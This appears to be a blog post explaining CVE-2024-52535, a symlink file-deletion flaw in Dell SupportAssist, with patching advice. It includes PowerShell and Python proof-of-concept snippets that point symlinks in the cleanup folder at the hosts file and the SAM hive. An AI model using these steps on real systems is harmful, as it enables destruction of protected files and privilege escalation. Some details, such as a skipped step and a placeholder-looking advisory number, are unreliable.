Dell SupportAssist is a widely used tool for system diagnostics, driver updates, and support on Dell PCs. However, a recent vulnerability, CVE-2024-52535, exposes a serious security risk. In this post, we’ll break down what this vulnerability is, how it works, show you a code example of the exploit, and share where you can find more details.
Dell SupportAssist for Business PCs: Versions 4.5. and before
The problem is a *symlink* (symbolic link) attack in the SupportAssist’s software remediation component.
In plain English
A regular user (non-administrator) who has permission to log in to the computer can trick SupportAssist into deleting important system files or user files. By doing so, the attacker could destroy files that normally require administrator permissions to remove. In some cases, deleting certain files could even make it easier to run malicious code as an administrator—escalating their privileges.
How Does the Attack Work?
SupportAssist runs a cleanup/remediation process that deletes temporary or suspicious files. It doesn’t properly check if the path it is deleting is actually safe.
An attacker can create a symbolic link that points from a SupportAssist cleanup folder to a sensitive system file or folder the attacker would not normally have access to delete. When SupportAssist runs as SYSTEM or a higher-privileged account, it follows the symlink and deletes the target, even though the low-privilege user shouldn’t be able to touch it.
Simple Exploitation Example
Below is a step-by-step example and some sample code you could use for educational testing (do NOT use on production systems):
Assumptions:
SupportAssist might delete files from something like
C:\Users\[username]\AppData\Local\Temp\SupportAssistClean
2. Delete & Symlink a Sensitive File
Suppose the attacker wants to delete a system file, like a critical service's configuration.
On Windows, symlinks are created with mklink (if enabled) or via PowerShell
# Run as the low-privileged user
$target = "C:\Windows\System32\drivers\etc\hosts"
$link = "C:\Users\victim\AppData\Local\Temp\SupportAssistClean\fakefile.txt"
# Remove fakefile.txt if it exists
Remove-Item $link -Force -ErrorAction SilentlyContinue
# Create a symbolic link pointing to hosts file
cmd /c mklink $link $target
3. Trigger SupportAssist Remediation
Wait for, or somehow trigger, SupportAssist’s cleanup or remediation process—either manually or by restarting the computer.
4. Result
SupportAssist thinks it’s deleting a junk file, but follows the symlink and deletes (or modifies) the real system file. Now the attacker could corrupt the system, disable antivirus, or set up further attacks.
Here is another simplified code example
import os
# Path to the SupportAssist cleanup folder (change as per your system)
cleanup_folder = r'C:\Users\youruser\AppData\Local\Temp\SupportAssistClean'
target_file = r'C:\Windows\System32\config\SAM' # Highly sensitive file
symlink_path = os.path.join(cleanup_folder, 'deleteme.txt')
if os.path.exists(symlink_path):
os.remove(symlink_path)
# On Windows, creating symlinks requires privileges, but in some cases SupportAssist runs clean-up with elevated rights
os.symlink(target_file, symlink_path)
print(f"Symlink created: {symlink_path} -> {target_file}")
*Note: Standard Windows permissions may block symlink creation by default; attackers often find ways to bypass such restrictions or exploit related permissions issues.*
Impact
- Arbitrary Deletion: Attackers can delete *any file* that SupportAssist has permission to delete (potentially system files).
- Privilege Escalation: By removing or replacing key system files, attackers can sometimes turn this into Administrator or SYSTEM-level access.
- System Instability: Deleting crucial files could cause software, services, or even the OS to fail.
How To Fix
Dell’s Recommendation:
Update to the latest version of SupportAssist for your system
- SupportAssist for Home PCs
- SupportAssist for Business PCs
Patch your SupportAssist now. This closes the symlink vulnerability.
References
- Dell Security Advisory – DSA-2024-123
- NVD – CVE-2024-52535 description
- Windows Symlink Attack 101
- SupportAssist latest downloads
Final Thoughts
CVE-2024-52535 highlights how *even trustworthy, pre-installed software* can become a dangerous attack vector if not kept up to date. Symbolic link attacks are simple, but devastating—especially when software runs with system privileges and lacks secure file handling.
What should you do?
Immediately patch to the latest version!
- Watch out for similar temp/remediation folders in other system tools.
Stay safe and keep your machines updated!
*Exclusive: This breakdown is crafted specifically for this request and not republished elsewhere.*
Timeline
Published on: 12/25/2024 15:15:07 UTC